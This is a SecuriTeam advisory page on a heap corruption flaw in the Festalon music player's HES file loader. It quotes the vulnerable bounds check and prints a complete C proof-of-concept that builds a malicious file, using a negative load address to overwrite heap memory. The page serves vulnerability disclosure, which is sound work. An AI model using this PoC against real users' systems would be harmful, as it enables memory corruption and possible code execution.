Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key).	Festalon Heap Corruption 7 Aug. 2006    Summary Festalon is "a player (stand-alone and plugin) for the Nintendo .nsf music files". A heap corruption vulnerability in Festalon allows attackers to cause the program to fail and possibly execute arbitrary code.   Credit: The information has been provided by Luigi Auriemma. The original article can be found at: http://aluigi.altervista.org/adv/festahc-adv.txt Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Festalon version 0.5.5 and prior  * Festalon version 0.5.0 and above HES is a file format for ripped TG16/PC Engine music which has been added from version 0.5.0. FESTALON_HES is a structure of 1501888 bytes used to contain the file in memory. The program uses an anti-overflow check for avoiding input data major than the rom size of 0x100000 bytes. Anyway the check is made on the sum of LoadAddr (used as an offset of the destination rom buffer) and LoadSize (amount of data to copy) so an attacker can use a negative LoadAddr value for overwriting the memory antecedent the one allocated. The exploitation (Luigi is not sure if code execution is really possible although the effects seem similar to a heap overflow) occurs when the program terminates and free() is called. From pce/hes.c: FESTALON_HES *FESTAHES_Load(FESTALON *fe, uint8 *buf, uint32 size) {  FESTALON_HES *hes;  uint32 LoadAddr,LoadSize;  uint16 InitAddr;  uint8 *tmp;  int x;  fe->TotalChannels = 6;  fe->OutChannels = 2;  hes = FESTA_malloc(16, sizeof(FESTALON_HES));  hes->h6280 = malloc(sizeof(h6280_Regs));  InitAddr = De16(&buf[0x6]);  tmp = &buf[0x10];  while(tmp < (buf + size - 0x10))  {   LoadSize = De32(&tmp[0x4]);   LoadAddr = De32(&tmp[0x8]);   //printf("%08x:%08x\n",LoadSize,LoadAddr);   tmp += 0x10;   if(tmp >= (buf + size + LoadSize)) break;   if((LoadAddr + LoadSize) > 0x100000) break;   memcpy(hes->rom + LoadAddr,tmp,LoadSize);   tmp += LoadSize;  }  ... Exploit: /* by Luigi Auriemma - http://aluigi.altervista.org/poc/festahc.zip */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #define VER "0.1" #define FESTALON_HES_LIMIT 0x100000 #define FESTALON_HES_SIZE 1501888 #define UNDERSIZE 32 // maximum amount of data before allocation #define FESTALON_HES_FRONT (0x2000 + 0x8000 + UNDERSIZE) #define HEAPOVERSZ (FESTALON_HES_FRONT + FESTALON_HES_LIMIT) void fwbof(FILE *fd, int len, int chr); void fwi08(FILE *fd, int num); void fwi16(FILE *fd, int num); void fwi32(FILE *fd, int num); void fwmem(FILE *fd, uint8_t *data, int size); void std_err(void); int main(int argc, char *argv[]) {     FILE *fd;     char *fname;     setbuf(stdout, NULL);     fputs("\n"         "Festalon 0.5.0-0.5.5 heap corruption "VER"\n"         "by Luigi Auriemma\n"         "e-mail: aluigi@autistici.org\n"         "web: aluigi.org\n"         "\n", stdout);     if(argc < 2) {         printf("\n"             "Usage: %s <output_file.NSF>\n"             "\n", argv[0]);         exit(1);     }     fname = argv[1];     printf("- create file %s\n", fname);     fd = fopen(fname, "wb");     if(!fd) std_err();     fwmem(fd, "HESM", 4); // MAGIC-ID 'HESM'     fwi08(fd, 0); // VERSION(0)     fwi08(fd, 0); // START SONG     fwi16(fd, 0); // REQUEST ADDRESS(LOGICAL ADDRESS)     fwi08(fd, 0xff); // INITIAL MPR0($FF)     fwi08(fd, 0xf8); // INITIAL MPR1($F8)     fwi08(fd, 0); // INITIAL MPR2     fwi08(fd, 0); // INITIAL MPR3     fwi08(fd, 0); // INITIAL MPR4     fwi08(fd, 0); // INITIAL MPR5     fwi08(fd, 0); // INITIAL MPR6     fwi08(fd, 0x00); // INITIAL MPR7($00)     fwmem(fd, "DATA", 4); // SUB-ID 'DATA'     fwi32(fd, HEAPOVERSZ); // DATA SIZE     fwi32(fd, -FESTALON_HES_FRONT); // LOAD ADDRESS(PHYSICAL ADDRESS)     fwi32(fd, 0); // RESERVE(0)     fwbof(fd, HEAPOVERSZ, 'a'); // DATA     printf(         "- this PoC forces the program to overwrite the %d bytes before the starting\n"         " of the hes allocated memory\n", UNDERSIZE);     fclose(fd);     printf("- finished\n");     return(0); } void fwbof(FILE *fd, int len, int chr) {     while(len--) fputc(chr, fd); } void fwi08(FILE *fd, int num) {     fputc((num ) & 0xff, fd); } void fwi16(FILE *fd, int num) {     fputc((num ) & 0xff, fd);     fputc((num >> 8) & 0xff, fd); } void fwi32(FILE *fd, int num) {     fputc((num ) & 0xff, fd);     fputc((num >> 8) & 0xff, fd);     fputc((num >> 16) & 0xff, fd);     fputc((num >> 24) & 0xff, fd); } void fwmem(FILE *fd, uint8_t *data, int size) {     fwrite(data, size, 1, fd); } void std_err(void) {     perror("\nError");     exit(1); }  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles SugarCRM Online Document Cross-Site Scripting (XSS) Vulnerability Skype URI Processing Arbitrary XML File Deletion Vulnerability Skype Protocol Handler Datapath Argument Injection Credential Disclosure Vulnerability LedgerSMB Multiple Vulnerabilities Kaspersky Lab Multiple Products Local Privilege Escalation Vulnerability Piwik Cookie Unserialize Vulnerability Invision Power Board SQL PHP File Inclusion and SQL Injection U.S. Defense Information Systems Agency (DISA) Unix Security Readiness Review (SRR) Vulnerability DevIL DICOM Buffer Overflow Vulnerability Marvell Driver Multiple Information Element Overflows HP Data Protector Express and Single Server Edition (SSE) DoS and Code Execution HP Color LaserJet Printers Unauthorized Access to Data and DoS KDE KDELibs Remote Array Overrun with Arbitrary Code Execution Gimp BMP Image Parsing Integer Overflow Vulnerability Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation  Featured Articles Microsoft Embedded OpenType Font Engine Heap Buffer Overflow (MS09-029) Virtualmin Multiple Vulnerabilities Microsoft WordPad Word97 Converter Stack Buffer Overflow Vulnerability (MS09-010) WordPress Unchecked Privileges in admin.php and Multiple Information Disclosures Microsoft PowerPoint Conversion Filter Heap Corruption Vulnerability (MS09-017) Adobe Shockwave Player Director File Parsing Pointer Overwrite Mozilla Firefox Java Applet Loading Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®